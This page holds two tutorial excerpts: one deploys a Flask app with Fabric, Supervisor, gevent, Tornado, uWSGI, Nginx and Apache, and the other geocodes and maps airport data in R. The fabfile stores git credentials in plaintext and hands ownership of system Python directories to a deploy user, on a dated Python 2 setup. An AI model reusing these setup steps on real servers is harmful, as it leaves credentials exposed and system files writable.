How-To Tutorials

30 Sep 2015

16 min read

Deploying on your own server

In this article by Jack Stouffer, the author of the book Mastering Flask, you will learn how to deploy and host your application using the different options available, along with the advantages and disadvantages of each.

The most common way to deploy any web app is to run it on a server that you have control over. Control in this case means access to the terminal on the server with an administrator account. This type of deployment gives you the most freedom of all the choices, as it allows you to install any program or tool you wish. This is in contrast to other hosting solutions, where the web server and database are chosen for you. This type of deployment also happens to be the least expensive option.

The downside to this freedom is that you take on the responsibility of keeping the server up, backing up user data, keeping the software on the server up to date to avoid security issues, and so on. Entire books have been written on good server management, so if this is not a responsibility that you believe you or your company can handle, it would be best to choose one of the other deployment options.

This section is based on a Debian Linux-based server, as Linux is far and away the most popular OS for running web servers, and Debian is the most popular Linux distro (a particular combination of software and the Linux kernel released as a package). Any OS with Bash and a program called SSH (which will be introduced in the next section) will work for this article; the only differences will be the command-line programs used to install software on the server.

Each of the web servers covered in this article will use a protocol named Web Server Gateway Interface (WSGI), which is a standard designed to allow Python web applications to easily communicate with web servers. We will never directly work with WSGI.
However, most of the web server interfaces we will be using have WSGI in their name, and it can be confusing if you don't know what the name means.

Pushing code to your server with fabric

To automate the process of setting up and pushing our application code to the server, we will use a Python tool called fabric. Fabric is a command-line program that reads and executes Python scripts on remote servers using a tool called SSH. SSH is a protocol that allows a user of one computer to remotely log in to another computer and execute commands on the command line, provided that the user has an account on the remote machine.

To install fabric, we will use pip:

    $ pip install fabric

The fabric.api module used in this article belongs to the Fabric 1.x series, so on a current system you may need to pin the version (for example, pip install "fabric<2").

Fabric commands are collections of command-line programs to be run on the remote machine's shell, in this case, Bash. We are going to make three different commands: one to run our unit tests, one to set up a brand new server to our specifications, and one to have the server update its copy of the application code with git. We will store these commands in a new file at the root of our project directory called fabfile.py.

As it's the easiest to create, let's make the test command first:

    from fabric.api import local

    def test():
        local('python -m unittest discover')

To run this function from the command line, we can use fabric's command-line interface by passing the name of the command to run:

    $ fab test
    [localhost] local: python -m unittest discover
    .....
    ---------------------------------------------------------------------
    Ran 5 tests in 6.028s
    OK

Fabric has three main commands: local, run, and sudo. The local function, as seen in the preceding function, runs commands on the local computer. The run and sudo functions run commands on a remote machine, but sudo runs commands as an administrator. All of these functions notify fabric whether the command ran successfully or not.
If a command didn't run successfully, meaning that our tests failed in this case, any other commands in the function will not be run. This is useful for our commands because it prevents us from pushing any code to the server that does not pass our tests.

Now we need to create the command to set up a new server from scratch. This command will install the software our production environment needs and download the code from our centralized git repository. It will also create a new user that will act as the runner of the web server as well as the owner of the code repository.

Do not run your web server or have your code deployed by the root user. This opens your application to a whole host of security vulnerabilities.

This command will differ based on your operating system, and we will be adding to this command in the rest of the article based on what server you choose:

    from fabric.api import env, local, run, sudo, cd

    env.hosts = ['deploy@[your IP]']

    def upgrade_libs():
        sudo("apt-get update")
        sudo("apt-get upgrade")

    def setup():
        test()
        upgrade_libs()

        # necessary to install many Python libraries
        sudo("apt-get install -y build-essential")
        sudo("apt-get install -y git")
        sudo("apt-get install -y python")
        sudo("apt-get install -y python-pip")
        # necessary to install many Python libraries
        sudo("apt-get install -y python-all-dev")

        # creating users and changing group membership requires
        # administrator rights, hence sudo rather than run
        sudo("useradd -d /home/deploy/ deploy")
        sudo("gpasswd -a deploy sudo")

        # allows Python packages to be installed by the deploy user
        sudo("chown -R deploy /usr/local/")
        sudo("chown -R deploy /usr/lib/python2.7/")

        run("git config --global credential.helper store")

        with cd("/home/deploy/"):
            run("git clone [your repo URL]")

        with cd('/home/deploy/webapp'):
            run("pip install -r requirements.txt")
            run("python manage.py createdb")

There are two new fabric features in this script. One is the env.hosts assignment, which tells fabric the user and IP address of the machine it should be logging in to.
Second, there is the cd function used in conjunction with the with keyword, which executes any functions in the context of that directory instead of the home directory of the deploy user. The line that modifies the git configuration is there to tell git to remember your repository's username and password, so you do not have to enter them every time you wish to push code to the server. Also, before the server is set up, we update the server's software to keep it up to date.

Finally, we have the function to push our new code to the server. In time, this command will also restart the web server and reload any configuration files that come from our code. But this depends on the server you choose, so it is filled out in the subsequent sections:

    def deploy():
        test()
        upgrade_libs()
        with cd('/home/deploy/webapp'):
            run("git pull")
            run("pip install -r requirements.txt")

So, if we were to begin working on a new server, all we would need to do to set it up is to run the following commands:

    $ fab setup
    $ fab deploy

Running your web server with supervisor

Now that we have automated our updating process, we need some program on the server to make sure that our web server, and database if you aren't using SQLite, is running. To do this, we will use a simple program called supervisor. All that supervisor does is automatically run command-line programs in background processes and allow you to see the status of running programs. Supervisor also monitors all of the processes it's running, and if a process dies, it tries to restart it.

To install supervisor, we need to add it to the setup command in our fabfile.py:

    def setup():
        …
        sudo("apt-get install -y supervisor")

To tell supervisor what to do, we need to create a configuration file and then copy it to the /etc/supervisor/conf.d/ directory of our server during the deploy fabric command. Supervisor will load all of the files in this directory when it starts and attempt to run them.
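To make the monitoring behaviour described above concrete, here is a toy sketch of a restart loop in plain Python. It is not how supervisor is implemented; the function name run_with_restarts and the max_starts cap are made up for illustration, and a real supervisor would run indefinitely and manage many programs at once.

```python
import subprocess
import sys


def run_with_restarts(command, max_starts=3):
    """Run `command`, starting it again whenever it exits with an error.

    Returns how many times the command was started. The cap on starts is an
    assumption that keeps this demo finite; it is not a supervisor setting.
    """
    starts = 0
    while starts < max_starts:
        starts += 1
        exit_code = subprocess.call(command)
        if exit_code == 0:
            # A clean exit is treated as "finished", so we stop restarting.
            break
    return starts


# A stand-in "server" that crashes immediately with exit code 1.
crashing_command = [sys.executable, "-c", "import sys; sys.exit(1)"]
# A stand-in program that exits cleanly.
clean_command = [sys.executable, "-c", "pass"]

print(run_with_restarts(crashing_command, max_starts=3))
print(run_with_restarts(clean_command, max_starts=3))
```

The crashing command is started until the cap is reached, while the clean one is started only once, which is the basic idea behind letting a supervisor keep a web server alive.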
In a new file in the root of our project directory named supervisor.conf, add the following:

    [program:webapp]
    command=
    directory=/home/deploy/webapp
    user=deploy

    [program:rabbitmq]
    command=rabbitmq-server
    user=deploy

    [program:celery]
    command=celery worker -A celery_runner
    directory=/home/deploy/webapp
    user=deploy

This is the bare minimum configuration needed to get a web server up and running. But supervisor has a lot more configuration options. To view all of the customizations, go to the supervisor documentation at http://supervisord.org/.

This configuration tells supervisor to run a command in the context of /home/deploy/webapp under the deploy user. The right-hand side of the command value is empty because it depends on what server you are running, and it will be filled in for each section.

Now we need to add a sudo call in the deploy command to copy this configuration file to the /etc/supervisor/conf.d/ directory:

    def deploy():
        …
        with cd('/home/deploy/webapp'):
            …
            sudo("cp supervisor.conf /etc/supervisor/conf.d/webapp.conf")
            sudo('service supervisor restart')

A lot of projects just create the files on the server and forget about them, but having the configuration file stored in our git repository and copied on every deployment gives several advantages. First, it is easy to revert changes using git if something goes wrong. Second, we don't have to log in to our server in order to make changes to the files.

Don't use the Flask development server in production. Not only does it fail to handle concurrent connections, but it also allows arbitrary Python code to be run on your server.

Gevent

The simplest option to get a web server up and running is to use a Python library called gevent to host your application. Gevent is a Python library that adds an alternative way of doing concurrent programming, called coroutines, outside of the Python threading library.
Gevent has an interface for running WSGI applications that is both simple and has good performance. A simple gevent server can easily handle hundreds of concurrent users, which is more than 99 percent of websites on the Internet will ever have. The downside to this option is that its simplicity means a lack of configuration options. There is no way, for example, to add rate limiting to the server or to add HTTPS traffic. This deployment option is purely for sites that you don't expect to receive a huge amount of traffic. Remember YAGNI (short for You Aren't Gonna Need It); only upgrade to a different web server if you really need to.

Coroutines are a bit outside of the scope of this book, but a good explanation can be found at https://en.wikipedia.org/wiki/Coroutine.

To install gevent, we will use pip:

    $ pip install gevent

In a new file in the root of the project directory named gserver.py, add the following:

    # gevent.pywsgi replaces the older gevent.wsgi module,
    # which newer gevent releases no longer ship
    from gevent.pywsgi import WSGIServer
    from webapp import create_app

    app = create_app('webapp.config.ProdConfig')

    server = WSGIServer(('', 80), app)
    server.serve_forever()

To run the server with supervisor, just change the command value to the following:

    [program:webapp]
    command=python gserver.py
    directory=/home/deploy/webapp
    user=deploy

Now when you deploy, gevent will be installed automatically because requirements.txt is installed on every deployment, provided that you run pip freeze after every new dependency is added.

Tornado

Tornado is another very simple way to deploy WSGI apps purely with Python. Tornado is a web server that is designed to handle thousands of simultaneous connections. If your application needs real-time data, Tornado also supports websockets for continuous, long-lived connections to the server.

Do not use Tornado in production on a Windows server. The Windows version of Tornado is not only much slower, but it is also considered beta-quality software.
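Both the gevent server above and the Tornado wrapper described next are handed a WSGI application object. As a rough illustration of what that object is, here is a minimal sketch of a bare WSGI callable, exercised with the standard library's wsgiref helpers instead of a real server. The names hello_app and call_app are made up for this example; the Flask object returned by create_app plays the same role as hello_app.

```python
from wsgiref.util import setup_testing_defaults


def hello_app(environ, start_response):
    """A complete WSGI application: a callable taking (environ, start_response)."""
    body = b"Hello from a bare WSGI app\n"
    headers = [
        ("Content-Type", "text/plain"),
        ("Content-Length", str(len(body))),
    ]
    start_response("200 OK", headers)
    # WSGI applications return an iterable of byte strings.
    return [body]


def call_app(app, path="/"):
    """Invoke a WSGI app the way a server would, without opening a socket."""
    environ = {"PATH_INFO": path}
    setup_testing_defaults(environ)  # fills in the remaining required keys
    captured = {}

    def start_response(status, response_headers, exc_info=None):
        captured["status"] = status
        captured["headers"] = response_headers

    body = b"".join(app(environ, start_response))
    return captured["status"], body


status, body = call_app(hello_app)
print(status, body)
```

A WSGI server does essentially what call_app does for every incoming request, which is why the same application object can be moved between gevent, Tornado, and uWSGI without changes.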
To use Tornado with our application, we will use Tornado's WSGIContainer in order to wrap the application object to make it Tornado compatible. Then, Tornado will start to listen on port 80 for requests until the process is terminated. In a new file named tserver.py, add the following:

    from tornado.wsgi import WSGIContainer
    from tornado.httpserver import HTTPServer
    from tornado.ioloop import IOLoop
    from webapp import create_app

    app = WSGIContainer(create_app("webapp.config.ProdConfig"))
    http_server = HTTPServer(app)
    http_server.listen(80)
    IOLoop.instance().start()

To run Tornado with supervisor, just change the command value to the following:

    [program:webapp]
    command=python tserver.py
    directory=/home/deploy/webapp
    user=deploy

Nginx and uWSGI

If you need more performance or customization, the most popular way to deploy a Python web application is to use the web server Nginx as a frontend for the WSGI server uWSGI by using a reverse proxy. A reverse proxy is a program that retrieves content for a client from a server and returns it as if it came from the proxy itself, as shown in the following figure:

[Figure omitted]

Nginx and uWSGI are used in this way because we get the power of the Nginx frontend while having the customization of uWSGI.

Nginx is a very powerful web server that became popular by providing the best combination of speed and customization. Nginx is consistently faster than other web servers, such as Apache httpd, and has native support for WSGI applications. It achieves this speed through several good architecture decisions, as well as an early decision not to try to cover as many use cases as Apache does. Having a smaller feature set makes it much easier to maintain and optimize the code. From a programmer's perspective, it is also much easier to configure Nginx, as there is no giant default configuration file (httpd.conf) that needs to be overridden with .htaccess files in each of your project directories.
One downside is that Nginx has a much smaller community than Apache, so if you have an obscure problem, you are less likely to be able to find answers online. Also, it's possible that a feature that most programmers are used to in Apache isn't supported in Nginx.

uWSGI is a web server that supports several different types of server interfaces, including WSGI. uWSGI handles serving the application content as well as things such as load balancing traffic across several different processes and threads.

To install uWSGI, we will use pip in the following way:

    $ pip install uwsgi

In order to run our application, uWSGI needs a file with an accessible WSGI application. In a new file named wsgi.py in the top level of the project directory, add the following:

    from webapp import create_app

    app = create_app("webapp.config.ProdConfig")

To test uWSGI, we can run it from the command line with the following:

    $ uwsgi --socket 127.0.0.1:8080 --wsgi-file wsgi.py --callable app --processes 4 --threads 2

If you are running this on your server, you should be able to access port 8080 and see your app (if you don't have a firewall, that is). Note that --socket makes uWSGI speak its own uwsgi protocol rather than HTTP, so to view the app directly in a browser, without Nginx in front, swap --socket for --http.

What this command does is load the app object from the wsgi.py file and make it accessible from localhost on port 8080. It also spawns four different processes with two threads each, which are automatically load balanced by a master process. This number of processes is overkill for the vast, vast majority of websites. To start off, use a single process with two threads and scale up from there.

Instead of adding all of the configuration options on the command line, we can create a text file to hold our configuration, which brings the same benefits for configuration that were listed in the section on supervisor.
In a new file in the root of the project directory named uwsgi.ini, add the following:

    [uwsgi]
    socket = 127.0.0.1:8080
    wsgi-file = wsgi.py
    callable = app
    processes = 4
    threads = 2

uWSGI supports hundreds of configuration options as well as several official and unofficial plugins. To leverage the full power of uWSGI, you can explore the documentation at http://uwsgi-docs.readthedocs.org/.

Let's run the server now from supervisor:

    [program:webapp]
    command=uwsgi uwsgi.ini
    directory=/home/deploy/webapp
    user=deploy

We also need to install Nginx during the setup function:

    def setup():
        …
        sudo("apt-get install -y nginx")

Because we are installing Nginx from the OS's package manager, the OS will handle running Nginx for us.

At the time of writing, the Nginx version in the official Debian package manager is several years old. To install the most recent version, follow the instructions here: http://wiki.nginx.org/Install.

Next, we need to create an Nginx configuration file and then copy it to the /etc/nginx/sites-available/ directory when we push the code. In a new file in the root of the project directory named nginx.conf, add the following:

    server {
        listen 80;
        server_name your_domain_name;

        location / {
            include uwsgi_params;
            uwsgi_pass 127.0.0.1:8080;
        }

        location /static {
            alias /home/deploy/webapp/webapp/static;
        }
    }

What this configuration file does is tell Nginx to listen for incoming requests on port 80 and forward all requests to the WSGI application that is listening on port 8080. Also, it makes an exception for any requests for static files and instead sends those requests directly to the file system. Bypassing uWSGI for static files gives a great performance boost, as Nginx is really good at serving static files quickly.
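Because uwsgi.ini and nginx.conf must name the same address for the two servers to find each other, a small pre-deployment check can catch a mismatch early. The following is only a sketch under stated assumptions: the helper names (uwsgi_socket, nginx_uwsgi_targets, configs_agree) are made up for this example, the Nginx file is scanned with a simple regular expression rather than a real parser, and the sample texts are trimmed copies of the files shown above.

```python
import configparser
import re


def uwsgi_socket(ini_text):
    """Return the `socket` value from the [uwsgi] section of an ini file."""
    parser = configparser.ConfigParser()
    parser.read_string(ini_text)
    return parser["uwsgi"]["socket"].strip()


def nginx_uwsgi_targets(conf_text):
    """Return every address named in a `uwsgi_pass` directive."""
    return re.findall(r"uwsgi_pass\s+([^;\s]+)\s*;", conf_text)


def configs_agree(ini_text, conf_text):
    """True when at least one uwsgi_pass exists and all match the uWSGI socket."""
    targets = nginx_uwsgi_targets(conf_text)
    socket_address = uwsgi_socket(ini_text)
    return bool(targets) and all(t == socket_address for t in targets)


UWSGI_INI = """
[uwsgi]
socket = 127.0.0.1:8080
wsgi-file = wsgi.py
callable = app
processes = 4
threads = 2
"""

NGINX_CONF = """
server {
    listen 80;
    location / {
        include uwsgi_params;
        uwsgi_pass 127.0.0.1:8080;
    }
}
"""

print(configs_agree(UWSGI_INI, NGINX_CONF))
```

A check like this could be called from the test command in fabfile.py so that a mismatched port stops a deployment before it reaches the server; whether that is worth the extra code depends on how often the two files change.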
Finally, in the fabfile.py file:

    def deploy():
        …
        with cd('/home/deploy/webapp'):
            …
            sudo("cp nginx.conf "
                 "/etc/nginx/sites-available/[your_domain]")
            sudo("ln -sf /etc/nginx/sites-available/[your_domain] "
                 "/etc/nginx/sites-enabled/[your_domain]")
            sudo("service nginx restart")

Apache and uWSGI

Using Apache httpd with uWSGI has mostly the same setup. First off, we need an Apache configuration file in a new file in the root of our project directory named apache.conf:

    <VirtualHost *:80>
        <Location />
            ProxyPass uwsgi://127.0.0.1:8080/
        </Location>
    </VirtualHost>

This file just tells Apache to pass all requests on port 80 to the uWSGI web server listening on port 8080. But this functionality requires an extra Apache plugin from uWSGI called mod_proxy_uwsgi. We can install this as well as Apache in the setup command:

    def setup():
        …
        sudo("apt-get install -y apache2")
        sudo("apt-get install -y libapache2-mod-proxy-uwsgi")

Finally, in the deploy command, we need to copy our Apache configuration file into Apache's configuration directory:

    def deploy():
        …
        with cd('/home/deploy/webapp'):
            …
            sudo("cp apache.conf "
                 "/etc/apache2/sites-available/[your_domain]")
            sudo("ln -sf /etc/apache2/sites-available/[your_domain] "
                 "/etc/apache2/sites-enabled/[your_domain]")
            sudo("service apache2 restart")

Summary

In this article, you learned that there are many different options for hosting your application, each with its own pros and cons. Deciding on one depends on the amount of time and money you are willing to spend as well as the total number of users you expect.


Packt

29 Sep 2015

25 min read

Data Around Us

In this article by Gergely Daróczi, author of the book Mastering Data Analysis with R, we will discuss spatial data, also known as geospatial data, which identifies geographic locations, such as natural or constructed features around us. Although all observations have some spatial content, such as the location of the observation, this is out of most data analysis tools' range due to the complex nature of spatial information; alternatively, the spatiality might not be that interesting (at first sight) in the given research topic.

On the other hand, analyzing spatial data can reveal some very important underlying structures of the data, and it is well worth spending time visualizing the differences and similarities between close or far data points. In this article, we are going to help with this and will use a variety of R packages to:

- Retrieve geospatial information from the Internet
- Visualize points and polygons on a map

Geocoding

We will use the hflights dataset to demonstrate how one can deal with data bearing spatial information. To this end, let's aggregate our dataset, but instead of generating daily data, let's view the aggregated characteristics of the airports. For the sake of performance, we will use the data.table package:

    > library(hflights)
    > library(data.table)
    > dt <- data.table(hflights)[, list(
    +     N         = .N,
    +     Cancelled = sum(Cancelled),
    +     Distance  = Distance[1],
    +     TimeVar   = sd(ActualElapsedTime, na.rm = TRUE),
    +     ArrDelay  = mean(ArrDelay, na.rm = TRUE)) , by = Dest]

So we have loaded and then immediately transformed the hflights dataset to a data.table object. At the same time, we aggregated by the destination of the flights to compute:

- The number of rows
- The number of cancelled flights
- The distance
- The standard deviation of the elapsed time of the flights
- The arithmetic mean of the delays

The resulting R object looks like this:

    > str(dt)
    Classes 'data.table' and 'data.frame': 116 obs. of 6 variables:
     $ Dest     : chr "DFW" "MIA" "SEA" "JFK" ...
     $ N        : int 6653 2463 2615 695 402 6823 4893 5022 6064 ...
     $ Cancelled: int 153 24 4 18 1 40 40 27 33 28 ...
     $ Distance : int 224 964 1874 1428 3904 305 191 140 1379 862 ...
     $ TimeVar  : num 10 12.4 16.5 19.2 15.3 ...
     $ ArrDelay : num 5.961 0.649 9.652 9.859 10.927 ...
     - attr(*, ".internal.selfref")=<externalptr>

So we have 116 observations all around the world and five variables describing those. Although this seems to be a spatial dataset, we have no geospatial identifiers that a computer can understand per se, so let's fetch the geocodes of these airports from the Google Maps API via the ggmap package. First, let's see how it works when we are looking for the geo-coordinates of Houston:

    > library(ggmap)
    > (h <- geocode('Houston, TX'))
    Information from URL : http://maps.googleapis.com/maps/api/geocode/json?address=Houston,+TX&sensor=false
          lon      lat
    1 -95.3698 29.76043

So the geocode function can return the matched latitude and longitude of the string we sent to Google. Now let's do the very same thing for all flight destinations:

    > dt[, c('lon', 'lat') := geocode(Dest)]

Well, this took some time as we had to make 116 separate queries to the Google Maps API. Please note that Google limits you to 2,500 queries a day without authentication, so do not run this on a large dataset. There is a helper function in the package, called geocodeQueryCheck, which can be used to check the remaining number of free queries for the day.

Some of the methods and functions we plan to use in some later sections of this article do not support data.table, so let's fall back to the traditional data.frame format and also print the structure of the current object:

    > str(setDF(dt))
    'data.frame': 116 obs. of 8 variables:
     $ Dest     : chr "DFW" "MIA" "SEA" "JFK" ...
     $ N        : int 6653 2463 2615 695 402 6823 4893 5022 6064 ...
     $ Cancelled: int 153 24 4 18 1 40 40 27 33 28 ...
     $ Distance : int 224 964 1874 1428 3904 305 191 140 1379 862 ...
     $ TimeVar  : num 10 12.4 16.5 19.2 15.3 ...
     $ ArrDelay : num 5.961 0.649 9.652 9.859 10.927 ...
     $ lon      : num -97 136.5 -122.3 -73.8 -157.9 ...
     $ lat      : num 32.9 34.7 47.5 40.6 21.3 ...

This was pretty quick and easy, wasn't it? Now that we have the longitude and latitude values of all the airports, we can try to show these points on a map.

Visualizing point data in space

To start with, let's keep it simple and load some package-bundled polygons as the base map. To this end, we will use the maps package. After loading it, we use the map function to render the polygons of the United States of America, add a title, and then some points for the airports and also for Houston with a slightly modified symbol:

    > library(maps)
    > map('state')
    > title('Flight destinations from Houston,TX')
    > points(h$lon, h$lat, col = 'blue', pch = 13)
    > points(dt$lon, dt$lat, col = 'red', pch = 19)

And showing the airport names on the plot is pretty easy as well: we can use the well-known functions from the base graphics package. Let's pass the three-character names as labels to the text function with a slightly increased y value to shift the text above the previously rendered data points:

    > text(dt$lon, dt$lat + 1, labels = dt$Dest, cex = 0.7)

Now we can also specify the color of the points to be rendered. This feature can be used to plot our first meaningful map to highlight the number of flights in 2011 to different parts of the USA:

    > map('state')
    > title('Frequent flight destinations from Houston,TX')
    > points(h$lon, h$lat, col = 'blue', pch = 13)
    > points(dt$lon, dt$lat, pch = 19,
    +     col = rgb(1, 0, 0, dt$N / max(dt$N)))
    > legend('bottomright', legend = round(quantile(dt$N)), pch = 19,
    +     col = rgb(1, 0, 0, quantile(dt$N) / max(dt$N)), box.col = NA)

So the intensity of red shows the number of flights to the given points (airports); the values range from 1 to almost 10,000.
It would probably be more meaningful to compute these values on a state level, as there are many airports, very close to each other, that might be better aggregated at a higher administrative area level. To this end, we load the polygon of the states, match the points of interest (airports) with the overlaying polygons (states), and render the polygons as a thematic map instead of points, like we did on the previous pages.

Finding polygon overlays of point data

We already have all the data we need to identify the parent state of each airport. The dt dataset includes the geo-coordinates of the locations, and we managed to render the states as polygons with the map function. Actually, this latter function can return the underlying dataset without rendering a plot:

    > str(map_data <- map('state', plot = FALSE, fill = TRUE))
    List of 4
     $ x    : num [1:15599] -87.5 -87.5 -87.5 -87.5 -87.6 ...
     $ y    : num [1:15599] 30.4 30.4 30.4 30.3 30.3 ...
     $ range: num [1:4] -124.7 -67 25.1 49.4
     $ names: chr [1:63] "alabama" "arizona" "arkansas" "california" ...
     - attr(*, "class")= chr "map"

So we have around 16,000 points describing the boundaries of the US states, but this map data is more detailed than we actually need (see for example the names of the polygons starting with Washington):

    > grep('^washington', map_data$names, value = TRUE)
    [1] "washington:san juan island" "washington:lopez island"
    [3] "washington:orcas island"    "washington:whidbey island"
    [5] "washington:main"

In short, the non-connecting parts of a state are defined as separate polygons. To this end, let's save a list of the state names without the string after the colon:

    > states <- sapply(strsplit(map_data$names, ':'), '[[', 1)

We will use this list as the basis of aggregation from now on. Let's transform this map dataset into another class of object, so that we can use the powerful features of the sp package.
We will use the maptools package to do this transformation:

    > library(maptools)
    > us <- map2SpatialPolygons(map_data, IDs = states,
    +     proj4string = CRS("+proj=longlat +datum=WGS84"))

An alternative way of getting the state polygons might be to directly load those instead of transforming from other data formats as described earlier. To this end, you may find the raster package especially useful to download free map shapefiles from gadm.org via the getData function. Although these maps are way too detailed for such a simple task, you can always simplify those, for example, with the gSimplify function of the rgeos package.

So we have just created an object called us, which includes the polygons of map_data for each state with the given projection. This object can be shown on a map just like we did previously, although you should use the general plot method instead of the map function:

    > plot(us)

Besides this, however, the sp package supports so many powerful features! For example, it's very easy to identify the overlay polygons of the provided points via the over function. As this function name conflicts with the one found in the grDevices package, it's better to refer to the function along with the namespace using a double colon:

    > library(sp)
    > dtp <- SpatialPointsDataFrame(dt[, c('lon', 'lat')], dt,
    +     proj4string = CRS("+proj=longlat +datum=WGS84"))
    > str(sp::over(us, dtp))
    'data.frame': 49 obs. of 8 variables:
     $ Dest     : chr "BHM" "PHX" "XNA" "LAX" ...
     $ N        : int 2736 5096 1172 6064 164 NA NA 2699 3085 7886 ...
     $ Cancelled: int 39 29 34 33 1 NA NA 35 11 141 ...
     $ Distance : int 562 1009 438 1379 926 NA NA 1208 787 689 ...
     $ TimeVar  : num 10.1 13.61 9.47 15.16 13.82 ...
     $ ArrDelay : num 8.696 2.166 6.896 8.321 -0.451 ...
     $ lon      : num -86.8 -112.1 -94.3 -118.4 -107.9 ...
     $ lat      : num 33.6 33.4 36.3 33.9 38.5 ...

What happened here?
First, we passed the coordinates and the whole dataset to the SpatialPointsDataFrame function, which stored our data as spatial points with the given longitude and latitude values. Next, we called the over function to left-join the values of dtp to the US states.

An alternative way of identifying the state of a given airport is to ask for more detailed information from the Google Maps API. By changing the default output argument of the geocode function, we can get all address components for the matched spatial object, which of course includes the state as well. Look for example at the following code snippet:

    geocode('LAX','all')$results[[1]]$address_components

Based on this, you might want to get a similar output for all airports and filter the list for the short name of the state. The rlist package would be extremely useful in this task, as it offers some very convenient ways of manipulating lists in R.

The only problem here is that we matched only one airport to each state, which is definitely not okay. See for example the fourth entry in the earlier output: it shows LAX as the matched airport for California (returned by states[4]), although there are many others there as well.

To overcome this issue, we can do at least two things. First, we can use the returnList argument of the over function to return all matched rows of dtp, and we will then post-process that data:

    > str(sapply(sp::over(us, dtp, returnList = TRUE),
    +     function(x) sum(x$Cancelled)))
     Named int [1:49] 51 44 34 97 23 0 0 35 66 149 ...
     - attr(*, "names")= chr [1:49] "alabama" "arizona" "arkansas" ...

So we created and called an anonymous function that will sum up the Cancelled values of the data.frame in each element of the list returned by over.
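Conceptually, the overlay above answers one question per airport: which polygon contains this point? The following plain-Python sketch illustrates that idea with the classic ray-casting test and then sums a field per polygon. It is not how the sp package implements over; the function names and the rectangles and points below are made up purely for illustration and are not real state borders or airports.

```python
def point_in_polygon(lon, lat, polygon):
    """Ray-casting test: is (lon, lat) inside `polygon`, a list of (x, y) vertices?"""
    inside = False
    n = len(polygon)
    for i in range(n):
        x1, y1 = polygon[i]
        x2, y2 = polygon[(i + 1) % n]
        # Does a horizontal ray going right from the point cross this edge?
        if (y1 > lat) != (y2 > lat):
            x_cross = x1 + (lat - y1) * (x2 - x1) / (y2 - y1)
            if lon < x_cross:
                inside = not inside
    return inside


def sum_by_polygon(polygons, points, field):
    """For each named polygon, sum `field` over the points that fall inside it."""
    totals = {}
    for name, polygon in polygons.items():
        totals[name] = sum(
            p[field]
            for p in points
            if point_in_polygon(p["lon"], p["lat"], polygon)
        )
    return totals


# Hypothetical "states" (rectangles) and "airports" (points).
polygons = {
    "left": [(0, 0), (10, 0), (10, 10), (0, 10)],
    "right": [(10, 0), (20, 0), (20, 10), (10, 10)],
    "empty": [(30, 0), (40, 0), (40, 10), (30, 10)],
}
points = [
    {"lon": 2, "lat": 3, "Cancelled": 5},
    {"lon": 7, "lat": 8, "Cancelled": 2},
    {"lon": 15, "lat": 5, "Cancelled": 4},
]

totals = sum_by_polygon(polygons, points, "Cancelled")
print(totals)
```

As in the returnList output above, a polygon that contains no points ends up with a sum of 0 rather than a missing value.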
Another, probably cleaner, approach is to redefine dtp to only include the related values and pass a function to over to do the summary:

    > dtp <- SpatialPointsDataFrame(dt[, c('lon', 'lat')],
    +     dt[, 'Cancelled', drop = FALSE],
    +     proj4string = CRS("+proj=longlat +datum=WGS84"))
    > str(cancels <- sp::over(us, dtp, fn = sum))
    'data.frame': 49 obs. of 1 variable:
     $ Cancelled: int 51 44 34 97 23 NA NA 35 66 149 ...

Either way, we have a vector to merge back to the US state names:

    > val <- cancels$Cancelled[match(states, row.names(cancels))]

And to update all missing values to zero (as the number of cancelled flights in a state without any airport is not missing data, but exactly zero for sure):

    > val[is.na(val)] <- 0

Plotting thematic maps

Now we have everything to create our first thematic map. Let's pass the val vector to the previously used map function (or plot it using the us object), specify a plot title, add a blue point for Houston, and then create a legend, which shows the quantiles of the overall number of cancelled flights as a reference:

    > map("state", col = rgb(1, 0, 0, sqrt(val/max(val))), fill = TRUE)
    > title('Number of cancelled flights from Houston to US states')
    > points(h$lon, h$lat, col = 'blue', pch = 13)
    > legend('bottomright', legend = round(quantile(val)),
    +     fill = rgb(1, 0, 0, sqrt(quantile(val)/max(val))), box.col = NA)

Please note that, instead of a linear scale, we decided to compute the square root of the relative values to define the intensity of the fill color, so that we can visually highlight the differences between the states. This was necessary as most flight cancellations happened in Texas (748), and there were no more than 150 cancelled flights in any other state (with the average being around 45).
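The effect of the square-root scale is easy to check by hand. The short Python sketch below compares the two scales for the three figures quoted above (748 for Texas, the upper bound of 150 for any other state, and the rough average of 45); the function names are made up for this illustration, and the rounded inputs mean the results are approximations of what the plot actually uses.

```python
import math


def linear_alpha(value, maximum):
    """Color intensity on a linear scale, between 0 and 1."""
    return value / maximum


def sqrt_alpha(value, maximum):
    """Color intensity on a square-root scale, between 0 and 1."""
    return math.sqrt(value / maximum)


maximum = 748  # cancelled flights in Texas, as quoted in the text
for label, cancelled in [("Texas", 748), ("upper bound elsewhere", 150), ("average", 45)]:
    print(
        label,
        round(linear_alpha(cancelled, maximum), 2),
        round(sqrt_alpha(cancelled, maximum), 2),
    )
```

On the linear scale, a state with 150 cancellations would get an intensity of about 0.2 and an average state about 0.06, which is barely visible next to Texas; the square root lifts these to roughly 0.45 and 0.25, so differences between the other states remain readable.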
You can also easily load ESRI shape files or other geospatial vector data formats into R as points or polygons with a bunch of packages already discussed and a few others as well, such as the maptools, rgdal, dismo, raster, or shapefile packages. Another, probably easier, way to generate country-level thematic maps, especially choropleth maps, is to load the rworldmap package made by Andy South, and rely on the convenient mapCountryData function. Rendering polygons around points Besides thematic maps, another really useful way of presenting spatial data is to draw artificial polygons around the data points based on the data values. This is especially useful if there is no available polygon shape file to be used to generate a thematic map. A level plot, contour plot, or isopleths, might be an already familiar design from tourist maps, where the altitude of the mountains is represented by a line drawn around the center of the hill at the very same levels. This is a very smart approach having maps present the height of hills—projecting this third dimension onto a 2-dimensional image. Now let's try to replicate this design by considering our data points as mountains on the otherwise flat map. We already know the heights and exact geo-coordinates of the geometric centers of these hills (airports); the only challenge here is to draw the actual shape of these objects. In other words: Are these mountains connected? How steep are the hillsides? Should we consider any underlying spatial effects in the data? In other words, can we actually render these as mountains with a 3D shape instead of plotting independent points in space? If the answer for the last question is positive, then we can start trying to answer the other questions by fine-tuning the plot parameters. For now, let's simply suppose that there is a spatial effect in the underlying data, and it makes sense to visualize the data in such a way. 
